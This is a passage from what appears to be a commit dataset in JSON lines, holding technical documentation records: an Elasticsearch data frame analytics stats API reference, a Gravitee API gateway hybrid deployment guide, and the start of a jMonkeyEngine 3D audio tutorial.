`node`\n[%collapsible%open]\n=====\n`attributes`::::\n(object)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-attributes]\n\n`ephemeral_id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-ephemeral-id]\n\n`id`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-id]\n\n`name`::::\n(string)\nThe node name.\n\n`transport_address`::::\n(string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=node-transport-address]\n=====\n\n`progress`:::\n(array) The progress report of the {dfanalytics-job} by phase.\n+\n.Properties of phase objects\n[%collapsible%open]\n=====\n`phase`::::\n(string) Defines the phase of the {dfanalytics-job}. Possible phases: \n* `reindexing`, \n* `loading_data`, \n* `computing_outliers` (for {oldetection} only),\n* `feature_selection` (for {regression} and {classification} only),\n* `coarse_parameter_search` (for {regression} and {classification} only),\n* `fine_tuning_parameters` (for {regression} and {classification} only),\n* `final_training` (for {regression} and {classification} only),\n* `writing_results`.\n+\nTo learn more about the different phases, refer to\n{ml-docs}\/ml-dfa-phases.html[How a {dfanalytics} job works].\n \n`progress_percent`::::\n(integer) The progress that the {dfanalytics-job} has made expressed in \npercentage.\n=====\n\n`state`:::\n(string) The status of the {dfanalytics-job}, which can be one of the following\nvalues: `analyzing`, `failed`, `reindexing`, `started`, `starting`,`stopping`, \n`stopped`.\n====\n\/\/End of data_frame_analytics\n\n\n[[ml-get-dfanalytics-stats-response-codes]]\n== {api-response-codes-title}\n\n`404` (Missing resources)::\n If `allow_no_match` is `false`, this code indicates that there are no\n resources that match the request or only partial matches for the request.\n\n\n[[ml-get-dfanalytics-stats-example]]\n== {api-examples-title}\n\nThe following API retrieves usage information for the\n{ml-docs}\/ecommerce-outliers.html[{oldetection} {dfanalytics-job} example]:\n\n[source,console]\n--------------------------------------------------\nGET _ml\/data_frame\/analytics\/ecommerce\/_stats\n--------------------------------------------------\n\/\/ TEST[skip:Kibana sample data]\n\n[source,console-result]\n----\n{\n \"count\" : 1,\n \"data_frame_analytics\" : [\n {\n \"id\" : \"ecommerce\",\n \"state\" : \"stopped\",\n \"progress\" : [\n {\n \"phase\" : \"reindexing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"loading_data\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"analyzing\",\n \"progress_percent\" : 100\n },\n {\n \"phase\" : \"writing_results\",\n \"progress_percent\" : 100\n }\n ],\n \"data_counts\" : {\n \"training_docs_count\" : 3321,\n \"test_docs_count\" : 0,\n \"skipped_docs_count\" : 0\n },\n \"memory_usage\" : {\n \"timestamp\" : 1586905058000,\n \"peak_usage_bytes\" : 279484\n },\n \"analysis_stats\" : {\n \"outlier_detection_stats\" : {\n \"timestamp\" : 1586905058000,\n \"parameters\" : {\n \"n_neighbors\" : 0,\n \"method\" : \"ensemble\",\n \"compute_feature_influence\" : true,\n \"feature_influence_threshold\" : 0.1,\n \"outlier_fraction\" : 0.05,\n \"standardization_enabled\" : true\n },\n \"timing_stats\" : {\n \"elapsed_time\" : 245\n }\n }\n }\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67461ca987020752ce5d2b6f5082de8790cb1058","subject":"fix: hybrid architecture picture","message":"fix: hybrid architecture picture\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/installation-guide\/installation_guide_hybrid_deployment.adoc","new_file":"pages\/apim\/3.x\/installation-guide\/installation_guide_hybrid_deployment.adoc","new_contents":"[[gravitee-installation-hybrid-deployment]]\n= Hybrid deployment\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_installguide_hybrid_deployment.html\n:page-folder: apim\/installation-guide\n:page-description: Gravitee.io API Management - Hybrid deployment\n:page-keywords: Gravitee.io, API Platform, API Management, API Gateway, oauth2, openid, documentation, manual, guide, reference, api\n:page-layout: apim3x\n\n== Overview\nWhen you are running a hybrid architecture (i.e. a mix between on-premise and cloud deployment), there are constraints\n(which can be just technical constraints or cost constraints) preventing you from deploying all the components required by\nAPIM in each data center.\n\nAPIM presents a solution in the form of hybrid components (in the form of plugins), freeing you from these constraints so that you can find a new way to define\nyour architecture and deployment vision.\n\nWe can describe this as _hybrid mode_ or _hybrid deployment_.\n\n== Architecture\n\nThis is a typical hybrid APIM architecture:\n\n.Deployment architecture\nimage::apim\/3.x\/installation\/hybrid\/hybrid_deployment_architecture.png[Hybrid deployment architecture]\n\n== Configuration\n\nFor APIM Gateway to work in this architecture, you need two components:\n\n* A _technical API gateway_ (shown in green in the diagram) which exposes new HTTP services used to bridge HTTP calls to the\n underlying repository (which can be any of our supported repositories, including MongoDB, JDBC and so on)\n\n* A standard APIM Gateway (shown in red on the schema) with the default repository plugin switched to a new\nHTTP bridge repository plugin\n\nWith this infrastructure the standard APIM Gateway can communicate with the technical API gateway\nthrough a secure HTTP\/S channel, and your cloud data center does not need a datastore installation.\n\nNOTE: What we are describing as a technical API gateway is, in fact, a standard APIM Gateway which has been augmented with\na new plugin.\n\n=== APIM Gateway - HTTP bridge (server)\n\n==== Installation\n\nTo expose the new HTTP API, you need to install a new plugin inside the `plugins` directory of APIM Gateway.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-server-${PLUGIN_VERSION}.zip\n----\n\n[NOTE]\n====\nYou can remove some of the existing plugins available by default in APIM Gateway: the sync service,\nall the cache services, the policies and the resources.\n\nFor example, in Gravitee.io APIM 1.18.0, the `plugins` directory contains the following files :\n\n gravitee-gateway-services-localregistry-1.18.0.zip\n gravitee-gateway-services-ratelimit-1.2.0.zip\n gravitee-gateway-services-monitoring-1.18.0.zip\n gravitee-gateway-services-node-healthcheck-1.18.0.zip\n gravitee-reporter-elasticsearch-1.18.0.zip\n gravitee-reporter-file-1.3.0.zip\n gravitee-repository-ehcache-1.0.0.zip\n gravitee-repository-gateway-bridge-http-server-1.0.0.zip\n gravitee-repository-mongodb-1.18.0.zip\n\n====\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nservices:\n bridge:\n http:\n enabled: true\n port: 18092\n host: localhost\n authentication:\n # authentication type to be used for the core services\n # - none : to disable authentication\n # - basic : to use basic authentication\n # default is \"basic\"\n type: basic\n users:\n admin: adminadmin\n----\n\n==== Check the APIM Gateway node is running\n\nYou can test that your APIM Gateway node is running by sending an HTTP request to port `8082` on `localhost`:\n\n[source,bash]\n----\n$ curl -X GET http:\/\/localhost:18092\/_bridge\/apis\n----\n\nYou should receive a response containing an empty array or a list of APIs.\n\n=== APIM Gateway - HTTP repository (client)\n\n==== Installation\n\nTo consume the HTTP bridge, you need to replace default repository plugins (usually a MongoDB repository) with\na new HTTP repository in the APIM Gateway `plugins` directory.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-client-${PLUGIN_VERSION}.zip\n----\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nmanagement:\n type: http\n http:\n url: http:\/\/localhost:18092\/\n keepAlive: true\n idleTimeout: 30000\n connectTimeout: 10000\n authentication:\n basic:\n username: admin\n password: adminadmin\n----\n\n== Start the APIM Gateways\n\nStart the APIM Gateways. Your consumers will be able to call APIM Gateway with the HTTP repository as usual.\n","old_contents":"[[gravitee-installation-hybrid-deployment]]\n= Hybrid deployment\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_installguide_hybrid_deployment.html\n:page-folder: apim\/installation-guide\n:page-description: Gravitee.io API Management - Hybrid deployment\n:page-keywords: Gravitee.io, API Platform, API Management, API Gateway, oauth2, openid, documentation, manual, guide, reference, api\n:page-layout: apim3x\n\n== Overview\nWhen you are running a hybrid architecture (i.e. a mix between on-premise and cloud deployment), there are constraints\n(which can be just technical constraints or cost constraints) preventing you from deploying all the components required by\nAPIM in each data center.\n\nAPIM presents a solution in the form of hybrid components (in the form of plugins), freeing you from these constraints so that you can find a new way to define\nyour architecture and deployment vision.\n\nWe can describe this as _hybrid mode_ or _hybrid deployment_.\n\n== Architecture\n\nThis is a typical hybrid APIM architecture:\n\n.Deployment architecture\nimage::apim\/3.x\/installation\/hybrid\/hybrid_deployment_architecture.png\n\n== Configuration\n\nFor APIM Gateway to work in this architecture, you need two components:\n\n* A _technical API gateway_ (shown in green in the diagram) which exposes new HTTP services used to bridge HTTP calls to the\n underlying repository (which can be any of our supported repositories, including MongoDB, JDBC and so on)\n\n* A standard APIM Gateway (shown in red on the schema) with the default repository plugin switched to a new\nHTTP bridge repository plugin\n\nWith this infrastructure the standard APIM Gateway can communicate with the technical API gateway\nthrough a secure HTTP\/S channel, and your cloud data center does not need a datastore installation.\n\nNOTE: What we are describing as a technical API gateway is, in fact, a standard APIM Gateway which has been augmented with\na new plugin.\n\n=== APIM Gateway - HTTP bridge (server)\n\n==== Installation\n\nTo expose the new HTTP API, you need Sto install a new plugin inside the `plugins` directory of APIM Gateway.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-server-${PLUGIN_VERSION}.zip\n----\n\n[NOTE]\n====\nYou need to remove some of the existing plugins available by default in APIM Gateway: the sync service,\nall the cache services, the policies and the resources.\n\nFor example, in Gravitee.io APIM 1.18.0, the `plugins` directory contains the following files :\n\n gravitee-gateway-services-localregistry-1.18.0.zip\n gravitee-gateway-services-ratelimit-1.2.0.zip\n gravitee-gateway-services-monitoring-1.18.0.zip\n gravitee-gateway-services-node-healthcheck-1.18.0.zip\n gravitee-reporter-elasticsearch-1.18.0.zip\n gravitee-reporter-file-1.3.0.zip\n gravitee-repository-ehcache-1.0.0.zip\n gravitee-repository-gateway-bridge-http-server-1.0.0.zip\n gravitee-repository-mongodb-1.18.0.zip\n\n====\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nservices:\n bridge:\n http:\n enabled: true\n port: 18092\n host: localhost\n authentication:\n # authentication type to be used for the core services\n # - none : to disable authentication\n # - basic : to use basic authentication\n # default is \"basic\"\n type: basic\n users:\n admin: adminadmin\n----\n\n==== Check the APIM Gateway node is running\n\nYou can test that your APIM Gateway node is running by sending an HTTP request to port `8082` on `localhost`:\n\n[source,bash]\n----\n$ curl -X GET http:\/\/localhost:18092\/_bridge\/apis\n----\n\nYou should receive a response containing an empty array or a list of APIs.\n\n=== APIM Gateway - HTTP repository (client)\n\n==== Installation\n\nTo consume the HTTP bridge, you need to replace default repository plugins (usually a MongoDB repository) with\na new HTTP repository in the APIM Gateway `plugins` directory.\nThis plugin can be found at https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/\n\n[source,bash]\n----\n$ wget -O ${GRAVITEEIO_HOME}\/plugins https:\/\/download.gravitee.io\/graviteeio-apim\/plugins\/repositories\/gravitee-repository-gateway-bridge-http\/gravitee-repository-gateway-bridge-http-client-${PLUGIN_VERSION}.zip\n----\n\n==== Configuration\n\nYou configure the new plugin in the `gravitee.yml` file.\n\n[source,yaml]\n----\nmanagement:\n type: http\n http:\n url: http:\/\/localhost:18092\/\n keepAlive: true\n idleTimeout: 30000\n connectTimeout: 10000\n authentication:\n basic:\n username: admin\n password: adminadmin\n----\n\n== Start the APIM Gateways\n\nStart the APIM Gateways. Your consumers will be able to call APIM Gateway with the HTTP repository as usual.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d9a98f96c5ca2da248bfa564b445604db9b6001","subject":"Update hello_audio.adoc","message":"Update hello_audio.adoc\n\nChanged tip text to Admonition.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/beginner\/hello_audio.adoc","new_file":"src\/docs\/asciidoc\/jme3\/beginner\/hello_audio.adoc","new_contents":"= jMonkeyEngine 3 Tutorial (11) - Hello Audio\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: sound, documentation, beginner, intro\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nPrevious: <<jme3\/beginner\/hello_terrain#,Hello Terrain>>, Next: <<jme3\/beginner\/hello_effects#,Hello Effects>>\n\nThis tutorial explains how to add 3D sound to a game, and how to make sounds play together with events, such as clicking. You learn how to use an Audio Listener and Audio Nodes. You also make use of an Action Listener and a MouseButtonTrigger from the previous <<jme3\/beginner\/hello_input_system#,Hello Input>> tutorial to make a mouse click trigger a gun shot sound.\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select \u201cProperties, go to \u201cLibraries, press \u201cAdd Library and add the \u201cjme3-test-data library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.audio.AudioNode;\nimport com.jme3.audio.AudioData.DataType;\nimport com.jme3.input.MouseInput;\nimport com.jme3.input.controls.ActionListener;\nimport com.jme3.input.controls.MouseButtonTrigger;\nimport com.jme3.material.Material;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\n\n\/** Sample 11 - playing 3D audio. *\/\npublic class HelloAudio extends SimpleApplication {\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n private Geometry player;\n\n public static void main(String[] args) {\n HelloAudio app = new HelloAudio();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n flyCam.setMoveSpeed(40);\n \n \/** just a blue box floating in space *\/\n Box box1 = new Box(1, 1, 1);\n player = new Geometry(\"Player\", box1);\n Material mat1 = new Material(assetManager,\"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat1.setColor(\"Color\", ColorRGBA.Blue);\n player.setMaterial(mat1);\n rootNode.attachChild(player);\n\n \/** custom init methods, see below *\/\n initKeys();\n initAudio();\n }\n\n \/** We create two audio nodes. *\/\n private void initAudio() {\n \/* gun shot sound is to be triggered by a mouse click. *\/\n audio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n \/* nature sound - keeps playing in a loop. *\/\n audio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Ocean Waves.ogg\", DataType.Stream);\n audio_nature.setLooping(true); \/\/ activate continuous playing\n audio_nature.setPositional(true); \n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n\n \/** Move the listener with the a camera - for 3D audio. *\/\n @Override\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n}\n\n----\n\nWhen you run the sample, you should see a blue cube. You should hear a nature-like ambient sound. When you click, you hear a loud shot.\n\n\n== Understanding the Code Sample\n\nIn the `initSimpleApp()` method, you create a simple blue cube geometry called `player` and attach it to the scene \u2013 this is just arbitrary sample content, so you see something when running the audio sample.\n\nLet's have a closer look at `initAudio()` to learn how to use `AudioNode`s.\n\n\n== AudioNodes\n\nAdding sound to your game is quite simple: Save your audio files into your `assets\/Sound` directory. JME3 supports both Ogg Vorbis (.ogg) and Wave (.wav) file formats.\n\nFor each sound, you create an AudioNode. You can use an AudioNode like any node in the JME scene graph, e.g. attach it to other Nodes. You create one node for a gunshot sound, and one node for a nature sound.\n\n[source,java]\n----\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n\n----\n\nLook at the custom `initAudio()` method: Here you initialize the sound objects and set their parameters.\n\n[source,Java]\n----\n\naudio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n ...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream);\n\n----\n\nThese two lines create new sound nodes from the given audio files in the AssetManager. The `DataType.Buffer` flag means that you want to buffer these sounds before playing. (If you set this flag to `DataType.Stream`, the sound will be streamed, which makes sense for really long sounds.)\n\nYou want the gunshot sound to play _once_ (you don't want it to loop). You also specify its volume as gain factor (at 0, sound is muted, at 2, it is twice as loud, etc.).\n\n[source,java]\n----\n\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n----\n\n\n[IMPORTANT]\n====\nNote that setPositional(false) is pretty important when you use stereo sounds. Positional sounds must always be mono audio files, otherwise the engine will remind it to you with a crash.\n====\n\n\nThe nature sound is different: You want it to loop _continuously_ as background sound. This is why you set looping to true, and immediately call the play() method on the node. You also choose to set its volume to 3.\n\n[source,java]\n----\n\n audio_nature.setLooping(true); \/\/ activate continuous playing\n ...\n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n----\n\nHere you make audio_nature a positional sound that comes from a certain place. For that you give the node an explicit translation, in this example, you choose Vector3f.ZERO (which stands for the coordinates `0.0f,0.0f,0.0f`, the center of the scene.) Since jME supports 3D audio, you are now able to hear this sound coming from this particular location. Making the sound positional is optional. If you don't use these lines, the ambient sound comes from every direction.\n\n[source,java]\n----\n\n ...\n audio_nature.setPositional(true);\n audio_nature.setLocalTranslation(Vector3f.ZERO.clone());\n ...\n\n----\n\n[TIP]\n====\nAttach AudioNodes into the scene graph like all nodes, to make certain moving nodes stay up-to-date. If you don't attach them, they are still audible and you don't get an error message but 3D sound will not work as expected. AudioNodes can be attached directly to the root node or they can be attached inside a node that is moving through the scene and both the AudioNode and the 3d position of the sound it is generating will move accordingly.\n====\n\n[TIP]\n====\nplayInstance always plays the sound from the position of the AudioNode so multiple gunshots from one gun (for example) can be generated this way, however if multiple guns are firing at once then an AudioNode is needed for each one.\n====\n\n\n== Triggering Sound\n\nLet's have a closer look at `initKeys()`: As you learned in previous tutorials, you use the `inputManager` to respond to user input. Here you add a mapping for a left mouse button click, and name this new action `Shoot`.\n\n[source,java]\n----\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n----\n\nSetting up the ActionListener should also be familiar from previous tutorials. You declare that, when the trigger (the mouse button) is pressed and released, you want to play a gun sound.\n\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\nSince you want to be able to shoot fast repeatedly, so you do not want to wait for the previous gunshot sound to end before the next one can start. This is why you play this sound using the `playInstance()` method. This means that every click starts a new instance of the sound, so two instances can overlap. You set this sound not to loop, so each instance only plays once. As you would expect it of a gunshot.\n\n\n== Ambient or Situational?\n\nThe two sounds are two different use cases:\n\n* A gunshot is situational. You want to play it only once, right when it is triggered.\n** This is why you `setLooping(false)`.\n\n* The nature sound is an ambient, background noise. You want it to start playing from the start, as long as the game runs.\n** This is why you `setLooping(true)`.\n\n\nNow every sound knows whether it should loop or not. \n\nApart from the looping boolean, another difference is where `play().playInstance()` is called on those nodes:\n\n* You start playing the background nature sound right after you have created it, in the initAudio() method.\n[source,java]\n----\n audio_nature.play(); \/\/ play continuously!\n\n----\n\n* The gunshot sound, however, is triggered situationally, once, only as part of the `Shoot` input action that you defined in the ActionListener.\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\n\n\n== Buffered or Streaming?\n\nAs of 3.1-alpha2, the Enum in the AudioNode constructor defines whether the audio is buffered or streamed. For example:\n\n[source,java]\n----\naudio_gunshot = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer); \/\/ buffered\n...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream); \/\/ streamed \n----\n\nTypically, you stream long sounds, and buffer short sounds.\n\n+++<strike>Note that streamed sounds can not loop (i.e. setLooping will not work as you expect). Check the getStatus on the node and if it has stopped recreate the node.<\/strike>+++ (In 3.1-alpha2, this is wrong).\nIf you still run 3.0, the above is still the case aswell as a simple boolean will be used instead of `DataType`\n\n\n== Play() or PlayInstance()?\n[cols=\"2\", options=\"header\"]\n|===\n\na|audio.play()\na|audio.playInstance()\n\na|Plays buffered sounds.\na|Plays buffered sounds. \n\na|Plays streamed sounds.\na|Cannot play streamed sounds.\n\na|The same sound cannot play twice at the same time.\na|The same sounds can play multiple times and overlap.\n\n|===\n\n\n== Your Ear in the Scene\n\nTo create a 3D audio effect, JME3 needs to know the position of the sound source, and the position of the ears of the player. The ears are represented by an 3D Audio Listener object. The `listener` object is a default object in a SimpleApplication.\n\nIn order to make the most of the 3D audio effect, you must use the `simpleUpdate()` method to move and rotate the listener (the player's ears) together with the camera (the player's eyes).\n\n[source,java]\n----\n\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n----\n\nIf you don't do that, the results of 3D audio will be quite random.\n\n\n== Global, Directional, Positional?\n\nIn this example, you defined the nature sound as coming from a certain position, but not the gunshot sound. This means your gunshot is global and can be heard everywhere with the same volume. JME3 also supports directional sounds which you can only hear from a certain direction. \n\nIt makes equal sense to make the gunshot positional, and let the ambient sound come from every direction. How do you decide which type of 3D sound to use from case to case?\n\n* In a game with moving enemies you may want to make the gun shot or footsteps positional sounds. In these cases you must move the AudioNode to the location of the enemy before `playInstance()`ing it. This way a player with stereo speakers hears from which direction the enemy is coming.\n* Similarly, you may have game levels where you want one background sound to play globally. In this case, you would make the AudioNode neither positional nor directional (set both to false).\n* If you want sound to be \u201cabsorbed by the walls and only broadcast in one direction, you would make this AudioNode directional. This tutorial does not discuss directional sounds, you can read about <<jme3\/advanced\/audio#,Advanced Audio>> here.\n\nIn short, you must choose in every situation whether it makes sense for a sound to be global, directional, or positional.\n\n\n== Conclusion\n\nYou now know how to add the two most common types of sound to your game: Global sounds and positional sounds. You can play sounds in two ways: Either continuously in a loop, or situationally just once. You know the difference between buffering short sounds and streaming long sounds. You know the difference between playing overlapping sound instances, and playing unique sounds that cannot overlap with themselves. You also learned to use sound files that are in either .ogg or .wav format.\n\n[TIP]\n====\nJME's Audio implementation also supports more advanced effects such as reverberation and Doppler effect. Use these \u201cpro features to make audio sound different depending on whether it's in the hallway, in a cave, outdoors, or in a carpeted room. Find out more about environmental effects from the sample code included in the jme3test directory and from the advanced <<jme3\/advanced\/audio#,Audio>> docs.\n====\n\nWant some fire and explosions to go with your sounds? Read on to learn more about <<jme3\/beginner\/hello_effects#,effects>>.\n\n'''\n\nSee also:\n\n* <<jme3\/advanced\/audio#,Audio>>\n","old_contents":"= jMonkeyEngine 3 Tutorial (11) - Hello Audio\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: sound, documentation, beginner, intro\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nPrevious: <<jme3\/beginner\/hello_terrain#,Hello Terrain>>, Next: <<jme3\/beginner\/hello_effects#,Hello Effects>>\n\nThis tutorial explains how to add 3D sound to a game, and how to make sounds play together with events, such as clicking. You learn how to use an Audio Listener and Audio Nodes. You also make use of an Action Listener and a MouseButtonTrigger from the previous <<jme3\/beginner\/hello_input_system#,Hello Input>> tutorial to make a mouse click trigger a gun shot sound.\n\n\n[TIP]\n====\nTo use the example assets in a new jMonkeyEngine SDK project, right-click your project, select \u201cProperties, go to \u201cLibraries, press \u201cAdd Library and add the \u201cjme3-test-data library.\n====\n\n\n\n== Sample Code\n\n[source,java]\n----\npackage jme3test.helloworld;\n\nimport com.jme3.app.SimpleApplication;\nimport com.jme3.audio.AudioNode;\nimport com.jme3.audio.AudioData.DataType;\nimport com.jme3.input.MouseInput;\nimport com.jme3.input.controls.ActionListener;\nimport com.jme3.input.controls.MouseButtonTrigger;\nimport com.jme3.material.Material;\nimport com.jme3.math.ColorRGBA;\nimport com.jme3.scene.Geometry;\nimport com.jme3.scene.shape.Box;\n\n\/** Sample 11 - playing 3D audio. *\/\npublic class HelloAudio extends SimpleApplication {\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n private Geometry player;\n\n public static void main(String[] args) {\n HelloAudio app = new HelloAudio();\n app.start();\n }\n\n @Override\n public void simpleInitApp() {\n flyCam.setMoveSpeed(40);\n \n \/** just a blue box floating in space *\/\n Box box1 = new Box(1, 1, 1);\n player = new Geometry(\"Player\", box1);\n Material mat1 = new Material(assetManager,\"Common\/MatDefs\/Misc\/Unshaded.j3md\");\n mat1.setColor(\"Color\", ColorRGBA.Blue);\n player.setMaterial(mat1);\n rootNode.attachChild(player);\n\n \/** custom init methods, see below *\/\n initKeys();\n initAudio();\n }\n\n \/** We create two audio nodes. *\/\n private void initAudio() {\n \/* gun shot sound is to be triggered by a mouse click. *\/\n audio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n audio_gun.setPositional(false);\n audio_gun.setLooping(false);\n audio_gun.setVolume(2);\n rootNode.attachChild(audio_gun);\n\n \/* nature sound - keeps playing in a loop. *\/\n audio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Ocean Waves.ogg\", DataType.Stream);\n audio_nature.setLooping(true); \/\/ activate continuous playing\n audio_nature.setPositional(true); \n audio_nature.setVolume(3);\n rootNode.attachChild(audio_nature);\n audio_nature.play(); \/\/ play continuously!\n }\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). *\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n\n \/** Move the listener with the a camera - for 3D audio. *\/\n @Override\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n}\n\n----\n\nWhen you run the sample, you should see a blue cube. You should hear a nature-like ambient sound. When you click, you hear a loud shot.\n\n\n== Understanding the Code Sample\n\nIn the `initSimpleApp()` method, you create a simple blue cube geometry called `player` and attach it to the scene \u2013 this is just arbitrary sample content, so you see something when running the audio sample.\n\nLet's have a closer look at `initAudio()` to learn how to use `AudioNode`s.\n\n\n== AudioNodes\n\nAdding sound to your game is quite simple: Save your audio files into your `assets\/Sound` directory. JME3 supports both Ogg Vorbis (.ogg) and Wave (.wav) file formats.\n\nFor each sound, you create an AudioNode. You can use an AudioNode like any node in the JME scene graph, e.g. attach it to other Nodes. You create one node for a gunshot sound, and one node for a nature sound.\n\n[source,java]\n----\n\n private AudioNode audio_gun;\n private AudioNode audio_nature;\n\n----\n\nLook at the custom `initAudio()` method: Here you initialize the sound objects and set their parameters.\n\n[source,Java]\n----\n\naudio_gun = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer);\n ...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream);\n\n----\n\nThese two lines create new sound nodes from the given audio files in the AssetManager. The `DataType.Buffer` flag means that you want to buffer these sounds before playing. (If you set this flag to `DataType.Stream`, the sound will be streamed, which makes sense for really long sounds.)\n\nYou want the gunshot sound to play _once_ (you don't want it to loop). You also specify its volume as gain factor (at 0, sound is muted, at 2, it is twice as loud, etc.).\n\n[source,java]\n----\n\n 